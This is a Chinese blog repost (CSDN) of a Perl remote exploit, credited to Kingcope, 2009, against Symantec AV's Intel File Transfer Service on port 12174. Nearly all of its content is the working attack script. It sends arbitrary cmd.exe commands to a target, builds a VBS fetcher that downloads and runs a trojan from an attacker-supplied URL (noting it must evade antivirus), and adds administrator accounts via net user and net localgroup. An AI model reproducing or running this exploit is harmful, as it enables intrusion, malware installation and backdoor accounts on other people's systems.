赛门铁克远程溢出exp(转)

最新推荐文章于 2023-10-15 14:38:46 发布
最新推荐文章于 2023-10-15 14:38:46 发布
阅读量611 收藏
点赞数 1
分类专栏: 软件应用 文章标签: c command user socket function perl
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/eddielancy/article/details/5473720
版权

印象中好像是赛门铁克第二次出远程溢出漏洞了。。。那些企业sep用户可能会有些影响。脆弱的内网安全啊

攻击代码如下

赛门铁克远程溢出exp
# # # # # # # # # # # # # # # # # # # # # # # # #
### SYMANTEC AV w/ INTEL FILE TRANSFER SERVICE
### REMOTE SYSTEM LEVEL EXPLOIT
### USE AT YOUR OWN RISK!
# # # # # # # # # # # # # # # # # # # # # # # # #

use IO::Socket;

sub rce {
($target, $cmmd) = @_;
$sock = IO::Socket::INET->new(PeerAddr => $target,
                              PeerPort => '12174',
                              Proto    => 'tcp') || goto lbl;
$magic = sprintf("%d", 0xc0d3b4b3);
$command = "cmd.exe /C $cmmd | exit $magic";
$cmd = "$command";
$req = "/x00/x00/x00/x00" . pack("v", length($cmd)+1) . $cmd . "/x00";
print $sock $req;

read($sock, $res, 0x14);
$resp = substr($res, 0x10, 4);
if ($resp eq pack("L", 0xc0d3b4b3)) {
    print "SUCCESS!/n";
} else {
    print "COMMAND FAILED/n";
}

return;
lbl:
print "PORT CLOSED/n";
exit;

}

sub usage {
    print "usage: perl xpl.pl [-a ] [-a2 [-d ] [-t ]/n";
    print "-a IS ADDUSER WITH SID METHOD/n";
    print "-a2 IS ADDUSER BY NAME/n";
    print "-t IS TEST/n";
    print "-d IS DOWNLOAD AND EXEC, EXE FILE MUST NOT BE DETECTABLE BY SYMANTEC AV/n";
    print "Example: perl xpl.pl -a www.symantec.com r00t p455/n";
    exit;
}

print "/n*** Symantec AV Remote Exploit/n*** by Kingcope in 2009/n/n";
if ($#ARGV < 1) {
usage();
}
$specify = $ARGV[0];
$target = $ARGV[1];

if ($specify eq "-d" && $#ARGV != 2) {
    usage();  
}

if ($specify eq "-a" && $#ARGV != 3) {
    usage();  
}

if ($specify eq "-a2" && $#ARGV != 4) {
    usage();  
}

if ($specify eq "-t" && $#ARGV != 1) {
    usage();  
}

$|=1;

if ($specify eq "-d") {
$trojanurl = $ARGV[2];

$getcred[0] = "echo Function SaveBinaryData(FileName, ByteArray) > c://getcreds.vbs";
$getcred[1] = "echo Const adTypeBinary = 1 >> c://getcreds.vbs";
$getcred[2] = "echo Const adSaveCreateOverWrite = 2 >> c://getcreds.vbs";
$getcred[3] = "echo Dim BinaryStream >> c://getcreds.vbs";
$getcred[4] = "echo Set BinaryStream = CreateObject(/"ADODB.Stream/") >> c://getcreds.vbs";
$getcred[5] = "echo BinaryStream.Type = adTypeBinary >> c://getcreds.vbs";
$getcred[6] = "echo BinaryStream.Open >> c://getcreds.vbs";
$getcred[7] = "echo BinaryStream.Write ByteArray >> c://getcreds.vbs";
$getcred[8] = "echo BinaryStream.SaveToFile FileName, adSaveCreateOverWrite >> c://getcreds.vbs";
$getcred[9] = "echo End Function >> c://getcreds.vbs";
$getcred[10] = "echo Sub HTTPDownload( myURL, myPath ) >> c://getcreds.vbs";
$getcred[11] = "echo Set objHTTP = CreateObject( /"WinHttp.WinHttpRequest.5.1/" ) >> c://getcreds.vbs";
$getcred[12] = "echo objHTTP.Open /"GET/", myURL, False >> c://getcreds.vbs";
$getcred[13] = "echo objHTTP.Send >> c://getcreds.vbs";
$getcred[14] = "echo SaveBinaryData myPath, objHTTP.ResponseBody >> c://getcreds.vbs";
$getcred[15] = "echo End Sub >> c://getcreds.vbs";
$getcred[16] = "echo HTTPDownload /"$trojanurl/", /"c://installer.exe/" >> c://getcreds.vbs";
$getcred[17] = "echo Set shell = CreateObject(/"WScript.Shell/") >> c://getcreds.vbs";
$getcred[18] = "echo Set objEnv = shell.Environment(/"Process/") >> c://getcreds.vbs";
$getcred[19] = "echo Set objEnv2 = shell.Environment(/"User/") >> c://getcreds.vbs";
$getcred[20] = "echo Set objEnv3 = shell.Environment(/"System/") >> c://getcreds.vbs";
$getcred[21] = "echo sysRoot = objEnv(/"systemroot/") >> c://getcreds.vbs";
$getcred[22] = "echo userProfile = objEnv(/"userprofile/") >> c://getcreds.vbs";
$getcred[23] = "echo objEnv2(/"Path/") = sysRoot ^& /";/" ^& sysRoot ^&/"//system32;/" ^& sysRoot ^& /"//temp;/" ^& sysRoot ^& /"//wbem/" >> c://getcreds.vbs";
$getcred[24] = "echo objEnv3(/"Path/") = sysRoot ^& /";/" ^& sysRoot ^&/"//system32;/" ^& sysRoot ^& /"//temp;/" ^& sysRoot ^& /"//wbem/" >> c://getcreds.vbs";
$getcred[25] = "echo objEnv2(/"TEMP/") = sysRoot ^& /"//temp/" >> c://getcreds.vbs";
$getcred[26] = "echo objEnv2(/"TMP/") = sysRoot ^& /"//temp/" >> c://getcreds.vbs";
$getcred[27] = "echo objEnv3(/"TEMP/") = sysRoot ^& /"//temp/" >> c://getcreds.vbs";
$getcred[28] = "echo objEnv3(/"TMP/") = sysRoot ^& /"//temp/" >> c://getcreds.vbs";
$getcred[29] = "echo shell.CurrentDirectory = /"c:///" >> c://getcreds.vbs";
$getcred[30] = "echo shell.Run Chr(34) ^& /"c://installer.exe/" ^& Chr(34), 1, false >> c://getcreds.vbs";
$getcred[31] = "echo Set shell = Nothing >> c://getcreds.vbs";

$commandx = $getcred[0];
for ($k=1;$k<=31;$k++) {
    $commandx .= " && ".$getcred[$k];
}

print "UPLOAD AND RUN KIT .. ";
rce($target, "$commandx && c://getcreds.vbs");
sleep(3);
print "/n";
print "DELETE KIT FETCHER .. ";
rce($target, "del c://getcreds.vbs");
print "COMPLETED....";
}

if ($specify eq "-a") {
$getcreds[0] = "echo strComputer = /"./" > c://getcred.vbs";
$getcreds[1] = "echo strSID = /"S-1-5-32-544/" >> c://getcred.vbs";
$getcreds[2] = "echo Set objWMIService = GetObject(/"winmgmts:/" ^& strComputer ^& /"//root//cimv2/") >> c://getcred.vbs";
$getcreds[3] = "echo Set objSID = objWMIService.Get(/"Win32_SID='/" ^& strSID ^& /"'/") >> c://getcred.vbs";
$getcreds[4] = "echo groupname=objSID.AccountName >> c://getcred.vbs";
$getcreds[5] = "echo Set objNetwork = WScript.CreateObject(/"WScript.Network/") >> c://getcred.vbs";
$getcreds[6] = "echo Set objGroup = GetObject(/"WinNT:///" ^& objNetwork.ComputerName ^& /"//"^&groupname^&/",group/") >> c://getcred.vbs";
$getcreds[7] = "echo Admin_Name = WScript.Arguments(0) >> c://getcred.vbs";
$getcreds[8] = "echo Path = /"WinNT:///" ^& objNetwork.ComputerName ^& /"//" ^& Admin_Name >> c://getcred.vbs";
$getcreds[9] = "echo If Not objGroup.IsMember(Path) Then >> c://getcred.vbs";
$getcreds[10] = "echo objGroup.Add(Path) >> c://getcred.vbs";
$getcreds[11] = "echo End If >> c://getcred.vbs";
$getcreds[12] = "echo Set objGroup = Nothing >> c://getcred.vbs";
$getcreds[13] = "echo set objNetwork = Nothing >> c://getcred.vbs";

$username = $ARGV[2];
$password = $ARGV[3];

$commandxx = $getcreds[0];
for ($k=1;$k<=13;$k++) {
    $commandxx .= " && " . $getcreds[$k];
}

print "RUN ADD USER .. ";
rce($target, "net user $username $password /add");
sleep(3);
print "/n";
print "RUN ADD TO GROUP .. ";
rce($target, "$commandxx && c://getcred.vbs $username && del c://getcred.vbs");
}

if ($specify eq "-a2") {
$username = $ARGV[2];
$password = $ARGV[3];
$admin = $ARGV[4];
print "RUN ADD USER .. ";
rce($target, "net user $username $password /add && net localgroup $admin $username /add");
}

if ($specify eq "-t") {
print "RUN TEST $target .. ";
rce($target, "echo ELITE .");
}

成功就可以执行任意命令,失败则导致拒绝服务。

本文来自CSDN博客,转载请标明出处:http://blog.csdn.net/linkboy2004/archive/2010/04/09/5466152.aspx

EddieLancy
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
远程桌面.Symantec.Pcanywhere.12.5.赛门铁克远程工具简体中文免费版.zip
06-29
远程桌面.Symantec.Pcanywhere.12.5.赛门铁克远程工具简体中文免费版
赛门铁克远程溢出exp
weixin_34281477的博客
04-15 64
印象中好像是赛门铁克第二次出远程溢出漏洞了。。。那些企业sep用户可能会有些影响。脆弱的内网安全啊 ***代码如下 赛门铁克远程溢出exp # # # # # # # # # # # # # # # # # # # # # # # # # ### SYMANTEC AV w/ INTEL FILE TRANSFER SERVICE ### REMOTE SYS...
二进制漏洞分析与挖掘
05-16 4805
本公众号分享的所有技术仅用于学习交流,请勿用于其他非法活动,如果错漏,欢迎留言指正 二进制漏洞分析与挖掘 《0day安全:软件漏洞分析技术第2版》王清电子工业出版社 入门用,但不全,过时了,linux部分没有包含进去 漏洞分析、挖掘和利用,安全领域重要和最具挑战性和对抗性的分支 应用在综合开发,算法,语法,系统底层,内核,逆向,汇编,调试等方方面面 漏洞是怎么回事? BUG:软件的功能性逻辑缺陷。影响软件的正常功能。 漏洞:能够导致软件做一些超出设计范围的事情的bug,则漏洞。这类BU..
利用第三方服务对目标进行被动信息收集防止被发现
10-15 614
DNS(Domain Name Server,域名服务器)是进行域名(domain name)和与之对应的IP地址(IP address)换的服务器,DNS服务器分为根域DNS服务器、顶级域名DNS服务器。
浏览 APT 报告中学习积累
沐一 · 林 的博客
07-11 320
通常我们在做渗透测试的时候,在拿到一个 webshell 的时候,我们需要对服务器进行提权操作,如果是一台 windows 的服务器,提权的时候通常是利用本地提权漏洞的 exp 进行溢出提权,有些 exp 可以直接在后面加参数,溢出成功之后执行参数中的命令,而有的 exp 溢出成功之后是返回一个 system 权限的 cmd,这时就需要我们将系统权限的 cmd shell 反弹回本地。这里我们使用 nc 在本地执行:上述命令的意思是在本地监听一个 3333 端口等待连接,假设你的电脑 IP 是公网的,并且
一键关闭赛门铁克程序
07-27
必要时一键关闭赛门铁克 1.防止CPU消耗过大,增加系统流畅度 2.此软件无需保持常驻时可关闭 3.重新需要开启,找到赛门铁克目录双击打开即可
赛门铁克的window 32位安装工具
最新发布
03-06
赛门铁克的window 32位安装工具
赛门铁克 诺顿 卸载工具
11-13
赛门铁克公司的诺顿杀毒软件卸载工具,小巧,好用,卸载的干净利落
赛门铁克卸载工具cleanwipe.rar
08-26
CleanWipe最新版软件特色 ...Ps: CleanWipe只能卸载低于其版本号的赛门铁克[Symantec Endpoint Protection] 只要是CleanWipe的子版本号大于赛门铁克的,那么就可以卸载。 卸载过程中途会重启,确认即可。
手把手教你用ppc手机远程控制电脑(摘自网络)
EddieLancy的专栏
12-18 3008
网络上的大片、游戏、软件资源太过丰富,让不少朋友都变成了十足的下载狂,电脑时刻都处于全负荷下载状态 ,即使外出离开,电脑也一直在下载,真是“不浪费一分钟、不浪费1K带宽”。但是我们有时出门在外,不能监 视电脑的下载情况,回到家后才发现某某电影没有源,某某游戏没种子,白白浪费了电费和感情。其实如果你使 用的是PPC手机,那么这个问题就很好解决,因为我们可以用PPC手机远程控制电
windows环境下PXE安装win2k、winXP、win2k3()
EddieLancy的专栏
12-19 2758
其实网络上已经有了网络安装xp的方法,所以本文重点在于实现过程中重要环节可能出现的问题。Windows server已经提供了网络安装服务,来部署xp或2003的网络安装,可这要在域模式下来实现。经过一些人的努力,实现了工作组模试的网络安装。通过网络安装windows,无疑是非常方便的批量装机方法,不用光驱,不用光盘,只要是可以从网络启动的电脑就可以从网络上安装xp或2003。这要在一些老电脑的独
PXE网络克隆详细教程()
EddieLancy的专栏
11-29 2364
PXE网络克隆详细教程 目前,相当多的电子教室都采用了没有软驱、光驱的工作站。在没有软驱、光驱的情况下,当硬盘的软件系统出现问题时,能否实现网络硬盘克隆呢?PXE(Preboot Execution Environment,它是基于TCP/IP、DHCP、TFTP等Internet协议之上的扩展网络协议)技术提供的从网络启动的功能,让我们找到了解决之道。下面,我们就来讲解怎样采用赛门铁克的磁盘
通过网络安装操作系统-ghost
EddieLancy的专栏
11-29 1014
PXE(Pre-boot Execution Environment)是Intel开发可协议,用于网络启动如果您 没有/不想用 CD/FD/U盘 来启动系统,也许这是一个不错的选择对于没有光驱的轻薄配置的笔记本更加适用 如何知道自己的小黑是否支持PXE呢? 只要进入Bios,在Startup中找到有Lan的选项,就支持了 配置需求(两台电脑,一根网线) 1. 要启动的机器(
sql注入常用语句
EddieLancy的专栏
11-20 677
and exists (select * from sysobjects) //判断是否是MSSQL and exists(select * from tableName) //判断某表是否存在..tableName为表名 and 1=(select @@VERSION) //MSSQL版本 And 1=(select db_name()) //当前数据库名 and 1=(sele
打造RIS服务器
EddieLancy的专栏
11-29 518
在局域网中,工作站无休止地进行软件安装、升级、维护、删除操作,这些操作对网络管理员来说是庞大的工作量,同时,这些操作也可能产生安全问题。无论在企业,学校,或是网吧,网络管理员都希望有一种软件分发功能来简化这些复杂的操作。如果你们的局域网是域环境的话,那么只需在域控制器上部署RIS服务,就可以使工作站的软件安装变得轻松自如且安全无忧。下面我就详细演示从软件封装到RIS配置以及软件分发的详细过程。
apache+subversion
EddieLancy的专栏
11-18 393
安装步骤 . 下载 . http://www.apachelounge.com/download/binaries/httpd-2.2.4-win32-x86-ssl.zip . http://www.apachelounge.com/download/vcredist_x86-sp1.exe . http://subversion.tigris.org/files/docu
K8s 很难么?带你从头到尾捋一遍,不信你学不会
民工哥的博客
02-23 8695
点击关注公众号,回复“1024”获取2TB学习资源!为什么要学习 Kubernetes?虽然 Docker 已经很强大了,但是在实际使用上还是有诸多不便,比如集群管理、资源调度、文件管理等...
10天智能锁项目实战第1天(了解单片机STM32F401RET6和C语言基础)
北豼不太皮的博客
02-21 3084
10天智能锁项目实战第1天(了解单片机STM32F401RET6和C语言基础)一、学习目标二、了解单片机STM32F401RET6三、C语言基础 一、学习目标 二、了解单片机STM32F401RET6 4、STM32F401RE特征 三、C语言基础 1.数据类型 常用2的次方: 2^7 = 128 2^8 = 256 2^15 = 32768 2^16= 65536 51单片机常见的数据类型: char: 占内存1字节 取值范围:-128~127 -2^7 ~ 2
赛门铁克nbu7.6
09-22
赛门铁克nbu7.6是一款由赛门铁克公司推出的网络安全产品。赛门铁克是全球领先的网络安全公司之一,其产品与服务广泛应用于个人用户、中小企业以及大型企业的网络安全防护和风险管理中。 nbu7.6是赛门铁克的一个版本...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值